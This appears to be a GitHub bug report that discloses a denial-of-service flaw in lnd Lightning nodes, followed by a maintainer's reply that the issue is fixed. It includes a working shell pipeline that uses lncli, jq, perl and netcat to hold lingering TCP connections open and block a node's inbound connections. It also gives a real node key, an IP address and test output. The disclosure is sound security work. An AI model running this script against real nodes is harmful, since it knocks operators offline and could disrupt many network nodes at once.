simple DoS of lnd nodes

[robtex]

Background

it seems the accept loop is very vulnerable to some easy attacks.
i haven't checked the source code, since that is kind of cheating, but my stomach tells me a node can for some unexplainable reason accept only one new connection at a time in total?
this makes it possible for a light weight DoS by opening a lingering TCP connection to it.
this really must be hardened, and soon! it is too easy to disable a nodes inbound functionality, even by mistake. which is how i noticed this.

after seeing this and other peculiarities i would strongly like to suggest a serious audit of everything network related in lnd, and probably it should be redesigned. but first please make a quick fix for this particular issue.

Your environment

three lnd nodes.

• A the victim
• B the testing node
• C the attacker

Steps to reproduce

first try to connect to a victim A from B and disconnect again to see that it works

$ time lncli connect 02318a86649ae70b06e6951636b3addc29876fb3dec82a63757595915ae2e3652e@104.236.54.112:9735 ; lncli disconnect 02318a86649ae70b06e6951636b3addc29876fb3dec82a63757595915ae2e3652e
{

}

real    0m0.045s
user    0m0.024s
sys     0m0.008s
{

}

all well, established in 45ms. works multiple times.

now open a tcp connection to it from C and let it linger for a while. just for the heck of it, actually make two. opening a silent lingering tcp with netcat will do. when it closes by timeout in A, replace with a new one.

like this:

lncli describegraph | jq '.nodes[] | select(.pub_key | contains("02318a866"))' |  
jq -r '.addresses[].addr'|sort -uR| 
perl -pne 's/\[?([^]]*)\]?:(.*)$/netcat $1 $2 -q 1337/;chop;$_="timeout 300 bash -c \"while : ;do timeout 30 $_;done\"&";$_="$_ $_\n"'|
sh -v

IMPORTANT! when using this script, be careful and make sure you have the contains part match the test victims id properly. otherwise you will risk matching multiple victims and disabling ALL lnd nodes on the entire lightning network from accepting incoming connections!
also make sure you don't remove the outer timeout of 300 seconds, or it will stun the targets indefinitely!

now C will establish two concurrent TCP sessions to A

now try to connect from B to A again

$time lncli connect 02318a86649ae70b06e6951636b3addc29876fb3dec82a63757595915ae2e3652e@104.236.54.112:9735 ; lncli disconnect 02318a86649ae70b06e6951636b3addc29876fb3dec82a63757595915ae2e3652e
[lncli] rpc error: code = Unknown desc = read tcp 104.131.56.241:37322->104.236.54.112:9735: i/o timeout

real    0m15.037s
user    0m0.024s
sys     0m0.004s

and it fails. multiple times.

Expected behaviour

nodes should connect

Actual behaviour

they don't

[Roasbeef]

Fixed by #1001.